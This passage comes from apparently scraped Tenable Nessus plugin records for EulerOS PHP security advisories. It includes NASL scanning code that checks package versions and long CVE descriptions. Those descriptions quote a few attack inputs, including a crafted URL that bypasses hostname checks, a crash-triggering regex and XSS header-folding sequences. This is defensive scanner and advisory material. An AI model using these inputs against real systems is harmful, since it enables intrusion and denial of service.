script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:php-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:php-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:php-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:php-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:php-pdo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:php-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:php-process\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:php-recode\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:php-soap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:php-xml\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:php-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(3)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP3\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP3\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"php-5.4.16-42.h51\",\n \"php-cli-5.4.16-42.h51\",\n \"php-common-5.4.16-42.h51\",\n \"php-gd-5.4.16-42.h51\",\n \"php-ldap-5.4.16-42.h51\",\n \"php-mysql-5.4.16-42.h51\",\n \"php-odbc-5.4.16-42.h51\",\n \"php-pdo-5.4.16-42.h51\",\n \"php-pgsql-5.4.16-42.h51\",\n \"php-process-5.4.16-42.h51\",\n \"php-recode-5.4.16-42.h51\",\n \"php-soap-5.4.16-42.h51\",\n \"php-xml-5.4.16-42.h51\",\n \"php-xmlrpc-5.4.16-42.h51\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"3\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"php\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-06-17T15:30:36", "description": "According to the versions of the php packages installed, the EulerOS installation on the remote host is affected by the following vulnerabilities :\n\n - In PHP versions 7.1.x below 7.1.33, 7.2.x below 7.2.24 and 7.3.x below 7.3.11 in certain configurations of FPM setup it is possible to cause FPM module to write past allocated buffers into the space reserved for FCGI protocol data, thus opening the possibility of remote code execution.(CVE-2019-11043)\n\n - The finish_nested_data function in ext/standard/var_unserializer.re in PHP before 5.6.31, 7.0.x before 7.0.21, and 7.1.x before 7.1.7 is prone to a buffer over-read while unserializing untrusted data.\n Exploitation of this issue can have an unspecified impact on the integrity of PHP.(CVE-2017-12933)\n\n - ext/standard/var_unserializer.c in PHP before 5.6.25 and 7.x before 7.0.10 mishandles certain invalid objects, which allows remote attackers to cause a denial of service or possibly have unspecified other impact via crafted serialized data that leads to a (1)\n __destruct call or (2) magic method call.(CVE-2016-7124)\n\n - The match function in pcre_exec.c in PCRE before 8.37 mishandles the /(?:((abcd))|(((?:(?:(?:(?:abc|(?:abcdef))))b)abcdefghi )abc)|((*ACCEPT)))/ pattern and related patterns involving (*ACCEPT), which allows remote attackers to obtain sensitive information from process memory or cause a denial of service (partially initialized memory and application crash) via a crafted regular expression, as demonstrated by a JavaScript RegExp object encountered by Konqueror, aka ZDI-CAN-2547.(CVE-2015-8382)\n\n - An issue was discovered in PHP before 5.6.33, 7.0.x before 7.0.27, 7.1.x before 7.1.13, and 7.2.x before 7.2.1. There is Reflected XSS on the PHAR 404 error page via the URI of a request for a .phar file.(CVE-2018-5712)\n\n - exif_process_IFD_in_MAKERNOTE in ext/exif/exif.c in PHP before 5.6.37, 7.0.x before 7.0.31, 7.1.x before 7.1.20, and 7.2.x before 7.2.8 allows remote attackers to cause a denial of service (out-of-bounds read and application crash) via a crafted JPEG file.(CVE-2018-14851)\n\n - The SplObjectStorage unserialize implementation in ext/spl/spl_observer.c in PHP before 7.0.12 does not verify that a key is an object, which allows remote attackers to execute arbitrary code or cause a denial of service (uninitialized memory access) via crafted serialized data.(CVE-2016-7480)\n\n - ext/standard/var_unserializer.re in PHP before 5.6.26 mishandles object-deserialization failures, which allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via an unserialize call that references a partially constructed object.(CVE-2016-7411)\n\n - The odbc_bindcols function in ext/odbc/php_odbc.c in PHP before 5.6.12 mishandles driver behavior for SQL_WVARCHAR columns, which allows remote attackers to cause a denial of service (application crash) in opportunistic circumstances by leveraging use of the odbc_fetch_array function to access a certain type of Microsoft SQL Server table.(CVE-2015-8879)\n\n - In PHP before 5.6.32, 7.x before 7.0.25, and 7.1.x before 7.1.11, an error in the date extension's timelib_meridian handling of 'front of' and 'back of' directives could be used by attackers able to supply date strings to leak information from the interpreter, related to ext/date/lib/parse_date.c out-of-bounds reads affecting the php_parse_date function. NOTE: this is a different issue than CVE-2017-11145.(CVE-2017-16642)\n\n - The exif_process_IFD_in_JPEG function in ext/exif/exif.c in PHP before 5.5.35, 5.6.x before 5.6.21, and 7.x before 7.0.6 does not validate IFD sizes, which allows remote attackers to cause a denial of service (out-of-bounds read) or possibly have unspecified other impact via crafted header data.(CVE-2016-4543)\n\n - The exif_process_IFD_TAG function in ext/exif/exif.c in PHP before 5.5.35, 5.6.x before 5.6.21, and 7.x before 7.0.6 does not properly construct spprintf arguments, which allows remote attackers to cause a denial of service (out-of-bounds read) or possibly have unspecified other impact via crafted header data.(CVE-2016-4542)\n\n - The grapheme_strpos function in ext/intl/grapheme/grapheme_string.c in PHP before 5.5.35, 5.6.x before 5.6.21, and 7.x before 7.0.6 allows remote attackers to cause a denial of service (out-of-bounds read) or possibly have unspecified other impact via a negative offset.(CVE-2016-4541)\n\n - The grapheme_stripos function in ext/intl/grapheme/grapheme_string.c in PHP before 5.5.35, 5.6.x before 5.6.21, and 7.x before 7.0.6 allows remote attackers to cause a denial of service (out-of-bounds read) or possibly have unspecified other impact via a negative offset.(CVE-2016-4540)\n\n - The xml_parse_into_struct function in ext/xml/xml.c in PHP before 5.5.35, 5.6.x before 5.6.21, and 7.x before 7.0.6 allows remote attackers to cause a denial of service (buffer under-read and segmentation fault) or possibly have unspecified other impact via crafted XML data in the second argument, leading to a parser level of zero.(CVE-2016-4539)\n\n - ** DISPUTED ** Integer overflow in the php_raw_url_encode function in ext/standard/url.c in PHP before 5.5.34, 5.6.x before 5.6.20, and 7.x before 7.0.5 allows remote attackers to cause a denial of service (application crash) via a long string to the rawurlencode function. NOTE: the vendor says 'Not sure if this qualifies as security issue (probably not).'(CVE-2016-4070)\n\n - Use-after-free vulnerability in wddx.c in the WDDX extension in PHP before 5.5.33 and 5.6.x before 5.6.19 allows remote attackers to cause a denial of service (memory corruption and application crash) or possibly have unspecified other impact by triggering a wddx_deserialize call on XML data containing a crafted var element.(CVE-2016-3141)\n\n - In PHP before 5.6.28 and 7.x before 7.0.13, incorrect handling of various URI components in the URL parser could be used by attackers to bypass hostname-specific URL checks, as demonstrated by evil.example.com:80#@good.example.com/ and evil.example.com:80?@good.example.com/ inputs to the parse_url function (implemented in the php_url_parse_ex function in ext/standard/url.c).(CVE-2016-10397)\n\n - Multiple use-after-free vulnerabilities in SPL in PHP before 5.4.44, 5.5.x before 5.5.28, and 5.6.x before 5.6.12 allow remote attackers to execute arbitrary code via vectors involving (1) ArrayObject, (2) SplObjectStorage, and (3) SplDoublyLinkedList, which are mishandled during unserialization.(CVE-2015-6831)\n\n - An issue was discovered in Oniguruma 6.2.0, as used in Oniguruma-mod in Ruby through 2.4.1 and mbstring in PHP through 7.1.5. A heap out-of-bounds write occurs in bitset_set_range() during regular expression compilation due to an uninitialized variable from an incorrect state transition. An incorrect state transition in parse_char_class() could create an execution path that leaves a critical local variable uninitialized until it's used as an index, resulting in an out-of-bounds write memory corruption.(CVE-2017-9228)\n\n - An issue was discovered in Oniguruma 6.2.0, as used in Oniguruma-mod in Ruby through 2.4.1 and mbstring in PHP through 7.1.5. A stack out-of-bounds read occurs in mbc_enc_len() during regular expression searching.\n Invalid handling of reg->dmin in forward_search_range() could result in an invalid pointer dereference, as an out-of-bounds read from a stack buffer.(CVE-2017-9227)\n\n - An issue was discovered in Oniguruma 6.2.0, as used in Oniguruma-mod in Ruby through 2.4.1 and mbstring in PHP through 7.1.5. A heap out-of-bounds write or read occurs in next_state_val() during regular expression compilation. Octal numbers larger than 0xff are not handled correctly in fetch_token() and fetch_token_in_cc(). A malformed regular expression containing an octal number in the form of '\\700' would produce an invalid code point value larger than 0xff in next_state_val(), resulting in an out-of-bounds write memory corruption.(CVE-2017-9226)\n\n - An issue was discovered in Oniguruma 6.2.0, as used in Oniguruma-mod in Ruby through 2.4.1 and mbstring in PHP through 7.1.5. A stack out-of-bounds read occurs in match_at() during regular expression searching. A logical error involving order of validation and access in match_at() could result in an out-of-bounds read from a stack buffer.(CVE-2017-9224)\n\n - The exif_process_IFD_in_MAKERNOTE function in ext/exif/exif.c in PHP before 5.5.38, 5.6.x before 5.6.24, and 7.x before 7.0.9 allows remote attackers to cause a denial of service (out-of-bounds array access and memory corruption), obtain sensitive information from process memory, or possibly have unspecified other impact via a crafted JPEG image.(CVE-2016-6291)\n\n - The php_url_parse_ex function in ext/standard/url.c in PHP before 5.5.38 allows remote attackers to cause a denial of service (buffer over-read) or possibly have unspecified other impact via vectors involving the smart_str data type.(CVE-2016-6288)\n\n - Integer overflow in the php_html_entities function in ext/standard/html.c in PHP before 5.5.36 and 5.6.x before 5.6.22 allows remote attackers to cause a denial of service or possibly have unspecified other impact by triggering a large output string from the htmlspecialchars function.(CVE-2016-5094)\n\n - The get_icu_value_internal function in ext/intl/locale/locale_methods.c in PHP before 5.5.36, 5.6.x before 5.6.22, and 7.x before 7.0.7 does not ensure the presence of a '\\0' character, which allows remote attackers to cause a denial of service (out-of-bounds read) or possibly have unspecified other impact via a crafted locale_get_primary_language call.(CVE-2016-5093)\n\n - In PHP before 5.6.31, an invalid free in the WDDX deserialization of boolean parameters could be used by attackers able to inject XML for deserialization to crash the PHP interpreter, related to an invalid free for an empty boolean element in ext/wddx/wddx.c.(CVE-2017-11143)\n\n - The php_wddx_push_element function in ext/wddx/wddx.c in PHP before 5.6.29 and 7.x before 7.0.14 allows remote attackers to cause a denial of service (out-of-bounds read and memory corruption) or possibly have unspecified other impact via an empty boolean element in a wddxPacket XML document.(CVE-2016-9935)\n\n - ext/wddx/wddx.c in PHP before 5.6.28 and 7.x before 7.0.13 allows remote attackers to cause a denial of service (NULL pointer dereference) via crafted serialized data in a wddxPacket XML document, as demonstrated by a PDORow string.(CVE-2016-9934)\n\n - The ZIP signature-verification feature in PHP before 5.6.26 and 7.x before 7.0.11 does not ensure that the uncompressed_filesize field is large enough, which allows remote attackers to cause a denial of service (out-of-bounds memory access) or possibly have unspecified other impact via a crafted PHAR archive, related to ext/phar/util.c and ext/phar/zip.c.(CVE-2016-7414)\n\n - ext/mysqlnd/mysqlnd_wireprotocol.c in PHP before 5.6.26 and 7.x before 7.0.11 does not verify that a BIT field has the UNSIGNED_FLAG flag, which allows remote MySQL servers to cause a denial of service (heap-based buffer overflow) or possibly have unspecified other impact via crafted field metadata.(CVE-2016-7412)\n\n - An issue was discovered in Oniguruma 6.2.0, as used in Oniguruma-mod in Ruby through 2.4.1 and mbstring in PHP through 7.1.5. A SIGSEGV occurs in left_adjust_char_head() during regular expression compilation. Invalid handling of reg->dmax in forward_search_range() could result in an invalid pointer dereference, normally as an immediate denial-of-service condition.(CVE-2017-9229)\n\n - The openssl_random_pseudo_bytes function in ext/openssl/openssl.c in PHP before 5.4.44, 5.5.x before 5.5.28, and 5.6.x before 5.6.12 incorrectly relies on the deprecated RAND_pseudo_bytes function, which makes it easier for remote attackers to defeat cryptographic protection mechanisms via unspecified vectors.(CVE-2015-8867)\n\n - The sapi_header_op function in main/SAPI.c in PHP before 5.4.38, 5.5.x before 5.5.22, and 5.6.x before 5.6.6 supports deprecated line folding without considering browser compatibility, which allows remote attackers to conduct cross-site scripting (XSS) attacks against Internet Explorer by leveraging (1) %0A%20 or (2) %0D%0A%20 mishandling in the header function.(CVE-2015-8935)\n\n - An issue was discovered in PHP before 5.6.35, 7.0.x before 7.0.29, 7.1.x before 7.1.16, and 7.2.x before 7.2.4. Dumpable FPM child processes allow bypassing opcache access controls because fpm_unix.c makes a PR_SET_DUMPABLE prctl call, allowing one user (in a multiuser environment) to obtain sensitive information from the process memory of a second user's PHP applications by running gcore on the PID of the PHP-FPM worker process.(CVE-2018-10545)\n\n - An issue was discovered in ext/phar/phar_object.c in PHP before 5.6.36, 7.0.x before 7.0.30, 7.1.x before 7.1.17, and 7.2.x before 7.2.5. There is Reflected XSS on the PHAR 403 and 404 error pages via request data of a request for a .phar file. NOTE: this vulnerability exists because of an incomplete fix for CVE-2018-5712.(CVE-2018-10547)\n\n - The Apache2 component in PHP before 5.6.38, 7.0.x before 7.0.32, 7.1.x before 7.1.22, and 7.2.x before 7.2.10 allows XSS via the body of a 'Transfer-Encoding:\n chunked' request, because the bucket brigade is mishandled in the php_handler function in sapi/apache2handler/sapi_apache2.c.(CVE-2018-17082)\n\n - PHP through 7.1.11 enables potential SSRF in applications that accept an fsockopen or pfsockopen hostname argument with an expectation that the port number is constrained. Because a :port syntax is recognized, fsockopen will use the port number that is specified in the hostname argument, instead of the port number in the second argument of the function.(CVE-2017-7272 )\n\n - In PHP before 5.6.31, 7.x before 7.0.21, and 7.1.x before 7.1.7, a stack-based buffer overflow in the zend_ini_do_op() function in Zend/zend_ini_parser.c could cause a denial of service or potentially allow executing code. NOTE: this is only relevant for PHP applications that accept untrusted input (instead of the system's php.ini file) for the parse_ini_string or parse_ini_file function, e.g., a web application for syntax validation of php.ini directives.(CVE-2017-11628)\n\n - In PHP before 5.6.30 and 7.x before 7.0.15, the PHAR archive handler could be used by attackers supplying malicious archive files to crash the PHP interpreter or potentially disclose information due to a buffer over-read in the phar_parse_pharfile function in ext/phar/phar.c.(CVE-2017-11147)\n\n - In PHP before 5.6.31, 7.x before 7.0.21, and 7.1.x before 7.1.7, the openssl extension PEM sealing code did not check the return value of the OpenSSL sealing function, which could lead to a crash of the PHP interpreter, related to an interpretation conflict for a negative number in ext/openssl/openssl.c, and an OpenSSL documentation omission.(CVE-2017-11144)\n\n - The locale_accept_from_http function in ext/intl/locale/locale_methods.c in PHP before 5.5.38, 5.6.x before 5.6.24, and 7.x before 7.0.9 does not properly restrict calls to the ICU uloc_acceptLanguageFromHTTP function, which allows remote attackers to cause a denial of service (out-of-bounds read) or possibly have unspecified other impact via a call with a long argument.(CVE-2016-6294)\n\n - Session fixation vulnerability in the Sessions subsystem in PHP before 5.5.2 allows remote attackers to hijack web sessions by specifying a session ID.(CVE-2011-4718)\n\n - Off-by-one error in the phar_parse_zipfile function in ext/phar/zip.c in PHP before 5.5.30 and 5.6.x before 5.6.14 allows remote attackers to cause a denial of service (uninitialized pointer dereference and application crash) by including the / filename in a .zip PHAR archive.(CVE-2015-7804)\n\n - The php_wddx_push_element function in ext/wddx/wddx.c in PHP before 5.6.26 and 7.x before 7.0.11 allows remote attackers to cause a denial of service (invalid pointer access and out-of-bounds read) or possibly have unspecified other impact via an incorrect boolean element in a wddxPacket XML document, leading to mishandling in a wddx_deserialize call.(CVE-2016-7418)\n\n - The exif_process_user_comment function in ext/exif/exif.c in PHP before 5.5.38, 5.6.x before 5.6.24, and 7.x before 7.0.9 allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) via a crafted JPEG image.(CVE-2016-6292)\n\n - The make_http_soap_request function in ext/soap/php_http.c in PHP before 5.4.44, 5.5.x before 5.5.28, 5.6.x before 5.6.12, and 7.x before 7.0.4 allows remote attackers to obtain sensitive information from process memory or cause a denial of service (type confusion and application crash) via crafted serialized\n _cookies data, related to the SoapClient::__call method in ext/soap/soap.c.(CVE-2016-3185)\n\n - Directory traversal vulnerability in the ZipArchive::extractTo function in ext/zip/php_zip.c in PHP before 5.4.45, 5.5.x before 5.5.29, and 5.6.x before 5.6.13 and ext/zip/ext_zip.cpp in HHVM before 3.12.1 allows remote attackers to create arbitrary empty directories via a crafted ZIP archive.(CVE-2014-9767)\n\n - The phar_convert_to_other function in ext/phar/phar_object.c in PHP before 5.4.43, 5.5.x before 5.5.27, and 5.6.x before 5.6.11 does not validate a file pointer before a close operation, which allows remote attackers to cause a denial of service (segmentation fault) or possibly have unspecified other impact via a crafted TAR archive that is mishandled in a Phar::convertToData call.(CVE-2015-5589)\n\n - Directory traversal vulnerability in the PharData class in PHP before 5.4.44, 5.5.x before 5.5.28, and 5.6.x before 5.6.12 allows remote attackers to write to arbitrary files via a .. (dot dot) in a ZIP archive entry that is mishandled during an extractTo call.(CVE-2015-6833)\n\n - The phar_get_entry_data function in ext/phar/util.c in PHP before 5.5.30 and 5.6.x before 5.6.14 allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) via a .phar file with a crafted TAR archive entry in which the Link indicator references a file that does not exist.(CVE-2015-7803)\n\n - Stack consumption vulnerability in GD in PHP before 5.6.12 allows remote attackers to cause a denial of service via a crafted imagefilltoborder call.(CVE-2015-8874)\n\n - Stack-based buffer overflow in ext/phar/tar.c in PHP before 5.5.32, 5.6.x before 5.6.18, and 7.x before 7.0.3 allows remote attackers to cause a denial of service (application crash) or possibly have unspecified other impact via a crafted TAR archive.(CVE-2016-2554)\n\n - The phar_parse_zipfile function in zip.c in the PHAR extension in PHP before 5.5.33 and 5.6.x before 5.6.19 allows remote attackers to obtain sensitive information from process memory or cause a denial of service (out-of-bounds read and application crash) by placing a PK\\x05\\x06 signature at an invalid location.(CVE-2016-3142)\n\n - ext/session/session.c in PHP before 5.6.25 and 7.x before 7.0.10 skips invalid session names in a way that triggers incorrect parsing, which allows remote attackers to inject arbitrary-type session data by leveraging control of a session name, as demonstrated by object injection.(CVE-2016-7125)\n\n - The exif_process_IFD_in_TIFF function in ext/exif/exif.c in PHP before 5.6.25 and 7.x before 7.0.10 mishandles the case of a thumbnail offset that exceeds the file size, which allows remote attackers to obtain sensitive information from process memory via a crafted TIFF image.(CVE-2016-7128)\n\n - The get_icu_disp_value_src_php function in ext/intl/locale/locale_methods.c in PHP before 5.3.29, 5.4.x before 5.4.30, and 5.5.x before 5.5.14 does not properly restrict calls to the ICU uresbund.cpp component, which allows remote attackers to cause a denial of service (buffer overflow) or possibly have unspecified other impact via a locale_get_display_name call with a long first argument.(CVE-2014-9912)\n\n - Use-after-free vulnerability in the SPL unserialize implementation in ext/spl/spl_array.c in PHP before 5.4.44, 5.5.x before 5.5.28, and 5.6.x before 5.6.12 allows remote attackers to execute arbitrary code via crafted serialized data that triggers misuse of an array field.(CVE-2015-6832)\n\n - The make_http_soap_request function in ext/soap/php_http.c in PHP before 5.4.44, 5.5.x before 5.5.28, and 5.6.x before 5.6.12 does not properly retrieve keys, which allows remote attackers to cause a denial of service (NULL pointer dereference, type confusion, and application crash) or possibly execute arbitrary code via crafted serialized data representing a numerically indexed _cookies array, related to the SoapClient::__call method in ext/soap/soap.c.(CVE-2015-8835)\n\n - The uloc_acceptLanguageFromHTTP function in common/uloc.cpp in International Components for Unicode (ICU) through 57.1 for C/C++ does not ensure that there is a '\\0' character at the end of a certain temporary array, which allows remote attackers to cause a denial of service (out-of-bounds read) or possibly have unspecified other impact via a call with a long httpAcceptLanguage argument.(CVE-2016-6293)\n\n - When PHP EXIF extension is parsing EXIF information from an image, e.g. via exif_read_data() function, in PHP versions 7.1.x below 7.1.30, 7.2.x below 7.2.19 and 7.3.x below 7.3.6 it is possible to supply it with data what will cause it to read past the allocated buffer.\n This may lead to information disclosure or crash.(CVE-2019-11040)\n\n - When PHP EXIF extension is parsing EXIF information from an image, e.g. via exif_read_data() function, in PHP versions 7.1.x below 7.1.31, 7.2.x below 7.2.21 and 7.3.x below 7.3.8 it is possible to supply it with data what will cause it to read past the allocated buffer.\n This may lead to information disclosure or crash.(CVE-2019-11041)\n\n - When PHP EXIF extension is parsing EXIF information from an image, e.g. via exif_read_data() function, in PHP versions 7.1.x below 7.1.31, 7.2.x below 7.2.21 and 7.3.x below 7.3.8 it is possible to supply it with data what will cause it to read past the allocated buffer.\n This may lead to information disclosure or crash.(CVE-2019-11042)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2019-12-04T00:00:00", "type": "nessus", "title": "EulerOS 2.0 SP2 : php (EulerOS-SA-2019-2438)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-4718", "CVE-2014-9767", "CVE-2014-9912", "CVE-2015-5589", "CVE-2015-6831", "CVE-2015-6832", "CVE-2015-6833", "CVE-2015-7803", "CVE-2015-7804", "CVE-2015-8382", "CVE-2015-8835", "CVE-2015-8867", "CVE-2015-8874", "CVE-2015-8879", "CVE-2015-8935", "CVE-2016-10397", "CVE-2016-2554", "CVE-2016-3141", "CVE-2016-3142", "CVE-2016-3185", "CVE-2016-4070", "CVE-2016-4539", "CVE-2016-4540", "CVE-2016-4541", "CVE-2016-4542", "CVE-2016-4543", "CVE-2016-5093", "CVE-2016-5094", "CVE-2016-6288", "CVE-2016-6291", "CVE-2016-6292", "CVE-2016-6293", "CVE-2016-6294", "CVE-2016-7124", "CVE-2016-7125", "CVE-2016-7128", "CVE-2016-7411", "CVE-2016-7412", "CVE-2016-7414", "CVE-2016-7418", "CVE-2016-7480", "CVE-2016-9934", "CVE-2016-9935", "CVE-2017-11143", "CVE-2017-11144", "CVE-2017-11145", "CVE-2017-11147", "CVE-2017-11628", "CVE-2017-12933", "CVE-2017-16642", "CVE-2017-7272", "CVE-2017-9224", "CVE-2017-9226", "CVE-2017-9227", "CVE-2017-9228", "CVE-2017-9229", "CVE-2018-10545", "CVE-2018-10547", "CVE-2018-14851", "CVE-2018-17082", "CVE-2018-5712", "CVE-2019-11040", "CVE-2019-11041", "CVE-2019-11042", "CVE-2019-11043"], "modified": "2023-04-25T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:php", "p-cpe:/a:huawei:euleros:php-cli", "p-cpe:/a:huawei:euleros:php-common", "p-cpe:/a:huawei:euleros:php-gd", "p-cpe:/a:huawei:euleros:php-ldap", "p-cpe:/a:huawei:euleros:php-mysql", "p-cpe:/a:huawei:euleros:php-odbc", "p-cpe:/a:huawei:euleros:php-pdo", "p-cpe:/a:huawei:euleros:php-pgsql", "p-cpe:/a:huawei:euleros:php-process", "p-cpe:/a:huawei:euleros:php-recode", "p-cpe:/a:huawei:euleros:php-soap", "p-cpe:/a:huawei:euleros:php-xml", "p-cpe:/a:huawei:euleros:php-xmlrpc", "cpe:/o:huawei:euleros:2.0"], "id": "EULEROS_SA-2019-2438.NASL", "href": "https://www.tenable.com/plugins/nessus/131592", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(131592);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/25\");\n\n script_cve_id(\n \"CVE-2011-4718\",\n \"CVE-2014-9767\",\n \"CVE-2014-9912\",\n \"CVE-2015-5589\",\n \"CVE-2015-6831\",\n \"CVE-2015-6832\",\n \"CVE-2015-6833\",\n \"CVE-2015-7803\",\n \"CVE-2015-7804\",\n \"CVE-2015-8382\",\n \"CVE-2015-8835\",\n \"CVE-2015-8867\",\n \"CVE-2015-8874\",\n \"CVE-2015-8879\",\n \"CVE-2015-8935\",\n \"CVE-2016-10397\",\n \"CVE-2016-2554\",\n \"CVE-2016-3141\",\n \"CVE-2016-3142\",\n \"CVE-2016-3185\",\n \"CVE-2016-4070\",\n \"CVE-2016-4539\",\n \"CVE-2016-4540\",\n \"CVE-2016-4541\",\n \"CVE-2016-4542\",\n \"CVE-2016-4543\",\n \"CVE-2016-5093\",\n \"CVE-2016-5094\",\n \"CVE-2016-6288\",\n \"CVE-2016-6291\",\n \"CVE-2016-6292\",\n \"CVE-2016-6293\",\n \"CVE-2016-6294\",\n \"CVE-2016-7124\",\n \"CVE-2016-7125\",\n \"CVE-2016-7128\",\n \"CVE-2016-7411\",\n \"CVE-2016-7412\",\n \"CVE-2016-7414\",\n \"CVE-2016-7418\",\n \"CVE-2016-7480\",\n \"CVE-2016-9934\",\n \"CVE-2016-9935\",\n \"CVE-2017-11143\",\n \"CVE-2017-11144\",\n \"CVE-2017-11147\",\n \"CVE-2017-11628\",\n \"CVE-2017-12933\",\n \"CVE-2017-16642\",\n \"CVE-2017-7272\",\n \"CVE-2017-9224\",\n \"CVE-2017-9226\",\n \"CVE-2017-9227\",\n \"CVE-2017-9228\",\n \"CVE-2017-9229\",\n \"CVE-2018-10545\",\n \"CVE-2018-10547\",\n \"CVE-2018-14851\",\n \"CVE-2018-17082\",\n \"CVE-2018-5712\",\n \"CVE-2019-11040\",\n \"CVE-2019-11041\",\n \"CVE-2019-11042\",\n \"CVE-2019-11043\"\n );\n script_bugtraq_id(61929, 75974);\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/15\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0695\");\n\n script_name(english:\"EulerOS 2.0 SP2 : php (EulerOS-SA-2019-2438)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the php packages installed, the EulerOS\ninstallation on the remote host is affected by the following\nvulnerabilities :\n\n - In PHP versions 7.1.x below 7.1.33, 7.2.x below 7.2.24\n and 7.3.x below 7.3.11 in certain configurations of FPM\n setup it is possible to cause FPM module to write past\n allocated buffers into the space reserved for FCGI\n protocol data, thus opening the possibility of remote\n code execution.(CVE-2019-11043)\n\n - The finish_nested_data function in\n ext/standard/var_unserializer.re in PHP before 5.6.31,\n 7.0.x before 7.0.21, and 7.1.x before 7.1.7 is prone to\n a buffer over-read while unserializing untrusted data.\n Exploitation of this issue can have an unspecified\n impact on the integrity of PHP.(CVE-2017-12933)\n\n - ext/standard/var_unserializer.c in PHP before 5.6.25\n and 7.x before 7.0.10 mishandles certain invalid\n objects, which allows remote attackers to cause a\n denial of service or possibly have unspecified other\n impact via crafted serialized data that leads to a (1)\n __destruct call or (2) magic method\n call.(CVE-2016-7124)\n\n - The match function in pcre_exec.c in PCRE before 8.37\n mishandles the\n /(?:((abcd))|(((?:(?:(?:(?:abc|(?:abcdef))))b)abcdefghi\n )abc)|((*ACCEPT)))/ pattern and related patterns\n involving (*ACCEPT), which allows remote attackers to\n obtain sensitive information from process memory or\n cause a denial of service (partially initialized memory\n and application crash) via a crafted regular\n expression, as demonstrated by a JavaScript RegExp\n object encountered by Konqueror, aka\n ZDI-CAN-2547.(CVE-2015-8382)\n\n - An issue was discovered in PHP before 5.6.33, 7.0.x\n before 7.0.27, 7.1.x before 7.1.13, and 7.2.x before\n 7.2.1. There is Reflected XSS on the PHAR 404 error\n page via the URI of a request for a .phar\n file.(CVE-2018-5712)\n\n - exif_process_IFD_in_MAKERNOTE in ext/exif/exif.c in PHP\n before 5.6.37, 7.0.x before 7.0.31, 7.1.x before\n 7.1.20, and 7.2.x before 7.2.8 allows remote attackers\n to cause a denial of service (out-of-bounds read and\n application crash) via a crafted JPEG\n file.(CVE-2018-14851)\n\n - The SplObjectStorage unserialize implementation in\n 